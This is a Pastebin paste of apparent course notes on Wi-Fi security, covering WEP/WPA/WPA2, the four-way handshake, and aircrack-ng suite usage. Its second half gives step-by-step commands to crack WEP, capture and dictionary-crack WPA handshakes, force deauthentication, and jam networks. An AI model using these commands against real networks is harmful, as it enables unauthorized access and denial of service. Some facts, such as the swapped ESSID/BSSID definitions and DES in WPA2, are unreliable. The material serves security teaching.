API tools faq
paste
Mukezh

Session Wireless Network

Mukezh
Feb 25th, 2019
101
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.59 KB | None | 0 0
raw download clone embed print report
  1. Session 19
  2. ============
  3. What is wireless networks??
  4. -> Wireless networks are networks that are not connected to the cables or any such sort o things now the thing arrives why this technology came into existense as using such wireless networks enables companies to avoid costly process of introducing cables into building and making communication portable.It become quite messy to handle such wired communication whcih landed up to a solution of WI-FI (WIRELESS - FIDILITY).
  5.  
  6.  
  7. WIFI Alliance take care of such wireless issues and who certifies Wi-Fi products if they conform to certain standards of interoperability...
  8.  
  9. For using these Wireless Networks, there is an standard which sets Rules and Regulations to use Wireless Networks for using Internet named as "IEEE 802.11"
  10.  
  11. Free Wifi
  12. ==========
  13. Everybody goes on with free wifi like in Dominoes, Pizza hut, airports, railway station etc etc...
  14. Connecting to such Wifi leads to
  15. --> MITM (Man In The Middle attack)
  16. --> DDOS (Distributed Denial of Service)
  17. --> Impersonation
  18. --> Data Theft and even Identity Theft
  19.  
  20. Because of this free Wifi facility Hackers have started going with malicious activities so just because of this we require WIFI SECURITY.
  21.  
  22.  
  23. # In order to execute the WiFi smoothly several protocols were made but has been changed time to time because of security issues whic are listed below...
  24.  
  25. WEP (Wired Equivalent Privacy)
  26. WPA (Wi-Fi Protected Access)
  27. WPA2 (Wi-Fi Protected Access 2)
  28.  
  29.  
  30.  
  31. Wired Equivalent Privacy (WEP) was the first protection standard, introduced in 1997. By 2001, several serious weaknesses were identified so that today a WEP connection can be cracked within minutesThe main weakness of WEP is its use of static encryption keys. When you set up a router with a WEP encryption key, that key is used by every device on your network to encrypt every packet that’s transmitted.The WEP uses RC4 algorithm and DES standard.
  32.  
  33. Wi-Fi Protected Access (WPA) :
  34. To overcome the consequenses of the attacks occuring in the WEP ,WPA was introduced.Like coming to WPA it basically works with two scenarios one is with the Enterprise and the other is with the personal. WPA uses the temporal key integrity protocol (TKIP), which dynamically changes the key that the systems use making it difficult for a hacker to decrypt the key.
  35. Now this TKIP works with the Personal one when it comes with the other scenario i.e. WPA-Enterprise the authentication was done in the server side using the service called RADIUS(Remote Authentication Dial In User Service) and this Radius uses a protocol named as EAP (Extensible Authentication Protocol).
  36.  
  37. Wi-Fi Protected Access2 (WPA2) :
  38. As there were some difficulty in getting thing done with the WPA thing i.e. it was not having that much effective security and was not feasible for the normal person to get the RADIUS server implementation WPA2 was introduced.
  39. This WPA2 basically uses
  40. |
  41. |--> AES (Advanced Encryption Standard)
  42. | ==================================
  43. | # It is a symmetric block cipher chosen by the U.S. government to | protect classified information and is implemented in software and | hardware throughout the world to encrypt sensitive data.
  44. | # It uses 128 bit blocks, using keys sized at 128, 192, and 256 | bits.
  45. |
  46. |--> DES (Data Enryption Standard)
  47. | ==============================
  48. | # DES is an implementation of a Feistel Cipher. It uses 16 round | Feistel structure.
  49. | # The block size is 64-bit. key length is 64-bit.
  50. | # It has to go with 16 rounds of algorithmic function to get the | cipher text
  51. |
  52. |--> TKIP (Temporal Key Integrity Protocol)
  53. | =======================================
  54. | # TKIP was designed by the IEEE 802.11i task group and the Wi-Fi | Alliance as an interim solution to replace WEP without requiring | the replacement of legacy hardware.
  55. |
  56. |--> PSK (Pre-Shared Key)
  57. | ====================
  58. | #Wi-Fi Protected Access Pre-Shared Key (WPA-PSK) is a security | mechanism used to authenticate and validate users on a wireless LAN | (WLAN) or Wi-Fi connection. It is a variation of the WPA security | protocol. WPA-PSK is also known as WPA2-PSK or WPA Personal.
  59. |
  60. |--> CCMP
  61. | ====
  62. | # Counter mode Cipher block Chaining Message authentication code | Protocol.
  63. | # Mechanism for execution of cryptography for authentication.
  64. | # TKIP is now being obsolete and is replaced by the CCMP.
  65. | # The CCMP algorithm is based on the U.S. federal government's | Advanced Encryption Standard (AES).
  66. | # The Counter Mode component provides data privacy. The Cipher Block | Chaining Message Authentication Code component provides data | integrity and authentication.
  67.  
  68.  
  69. Four Way Handshake
  70. =======================
  71.  
  72. Router(AP) Client
  73. | | \ Beacons (Here you
  74. | | }--> see wireless network
  75. | NOUNCE (Broadcast) | / available)
  76. |----->----->------>-----|
  77. | |
  78. | |
  79. | |
  80. / |Reply of Nounce(unicast)|
  81. / |------<-----<------<----|
  82. Clicking on / | |
  83. a wifi { | |
  84. Network { | |
  85. \ | Message of Auth. |
  86. \ |---->----->----->-------|
  87. \ | (Multicast) |
  88. | |
  89. | |
  90. | |
  91. | |
  92. |Acknowledgment of | ---> KEY + Passphrase
  93. |------<-----<------<----| # here Passphrase is the
  94. |Authentication (Unicast)| password which user
  95. | | basically inputs
  96. | | and key is something
  97. | | which gets attached
  98. | | and is generally complex,so in order to make it user friendly we only have to put Passphrase
  99.  
  100.  
  101.  
  102.  
  103. The main thing which needs to be pointed out or need to be notice is what happen when we are an authenticated user then what is the scenario which happen during a connection ??
  104. Whether it is again going with the four way handshake or just going with something else...
  105.  
  106.  
  107.  
  108. CAPTURING WIRELESS COMMUNICATION PACKETS
  109. ==========================================
  110.  
  111. Attacker’s Machine - Kali OS
  112. Device Used - Leoxsys External WIFI Adapter (LEO-HG150N)
  113. Tool - Airmon-ng , Airodump-ng (Non-Graphical)
  114.  
  115.  
  116. Modes of Using a Wireless Adapter :
  117.  
  118. # Standard Mode : The mode which basically used by everyone to manage and use the services of a particular Access Point.
  119. # Monitoring Mode : The mode which allows a system with a wireless network interface controller to monitor all traffic received from the wireless network.
  120.  
  121. Command: iwconfig --> to check which mode that wifi adapter is working on
  122.  
  123.  
  124. Tools we will be encountering are :
  125.  
  126. * Airmon-ng : A tool which converts our wireless card into a promiscuous mode wireless card. Yes, that means that our wireless card will hookup with anyone !
  127. Well, that's almost correct. When our network card is in promiscuous mode, it means that it can see and receive all network traffic. Generally, network cards will only receive packets intended for them (as determined by the MAC address of the NIC), but with airmon-ng, it will receive all wireless traffic intended for us or not.
  128.  
  129. Commands:
  130. # iwconfig
  131. # airmon-ng start wlan0
  132. # kill PID (those which might create problem)
  133.  
  134.  
  135. * Airodump-ng : A tool which enables us to capture packets of our specification.This will show us some more information about a perticular wireless network. So lets discuss with some of the keywords.
  136.  
  137. Commands:
  138. # airodump-ng wlan0mon
  139. #
  140.  
  141.  
  142. Terminologies
  143. ==============
  144. Beacons : Number of beacons sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far.
  145.  
  146. #Data : Number of captured data packets, including data broadcast packets.
  147.  
  148. #s : Number of data packets per second measure over the last 10 seconds.
  149.  
  150. CH : Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference.
  151.  
  152. MB : Maximum speed supported by the AP.
  153.  
  154. ENC : Encryption algorithm in use. OPN = no encryption,"WEP?" = WEP or higher (not enough data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP or MGT is present.
  155.  
  156. CIPHER : The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2.
  157.  
  158. AUTH : The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2).
  159.  
  160. WPS : This is only displayed when --wps (or -W) is specified. If the AP supports WPS, the first field of the column indicates version supported.
  161.  
  162. ESSID : THe MAC / Physical Address of the Access Point.
  163.  
  164. BSSID : Name of the Access Point.
  165.  
  166. WEP
  167. ===
  168. #iwconfig
  169. #airmon-ng
  170. #airmon-ng start wlan0
  171. #iwconfig
  172. #airodump-ng wlan0mon
  173. bssid channel number
  174. #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
  175. Wait until the beacons number reaches to 25,000
  176. #aircrack-ng aranjit-01.cap
  177.  
  178. WPA|WPA2
  179. ========
  180. When there is a new device connecting
  181. -------------------------------------
  182. #iwconfig
  183. #airmon-ng
  184. #airmon-ng start wlan0
  185. #iwconfig
  186. #airodump-ng wlan0mon
  187. bssid channel number
  188. #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
  189. It will help you to get the WPA handshake
  190. #aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap
  191.  
  192.  
  193. When there is no new device connecting
  194. -------------------------------------
  195. #iwconfig
  196. #airmon-ng
  197. #airmon-ng start wlan0
  198. #iwconfig
  199. #airodump-ng wlan0mon
  200. bssid channel number
  201. #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
  202. It will help you to get the WPA handshake
  203. #aireplay-ng -0 10 -a <Router's BSSID> -s <Station's BSSID> wlan0mon
  204. This will make us capture the handshake
  205. #aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap
  206.  
  207. WiFi Jammer
  208. ===========
  209. #aireplay-ng -0 0 -a <Router's BSSID> -s FF:FF:FF:FF:FF:FF wlan0mon
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!